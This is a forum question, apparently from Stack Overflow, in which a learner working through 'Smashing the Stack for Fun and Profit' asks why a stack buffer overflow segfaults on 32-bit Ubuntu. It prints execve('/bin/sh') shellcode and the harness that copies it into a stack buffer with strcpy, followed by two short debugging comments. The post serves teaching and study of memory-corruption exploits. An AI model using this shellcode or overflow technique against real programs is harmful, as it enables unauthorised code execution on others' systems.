I've been going through "Smashing the stack for fun and profit" and am having issues executing shell code through a buffer overflow.
Running on Linux, Ubuntu 32bit via VirtualBox gcc compiler with -fno-stack-protector -ggdb -g tags
My code is identical to the reading and I don't understand why it's not working. I get a segmentation fault. When I use gbd to debug it says "0x08048268 in ??" which I know means it can't find the address in the scope. I don't understand why it shouldn't be able to.
I am compiling with stack guard off as well.
char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];
void main() {
char buffer[96];
int i;
long *long_ptr = (long *) large_string;
for (i = 0; i < 32; i++)
*(long_ptr + i) = (int) buffer;
for (i = 0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
large_string[127] = '\0';
strcpy(buffer,large_string);
}
memcpywould work better thanstrcpyin case large_string contains any zero bytes. Like in the address ofbufferconverted tolong. - Bo Perssonlarge_stringwill ever contain nul bytes.strcpyrequires nul terminated string. - user694733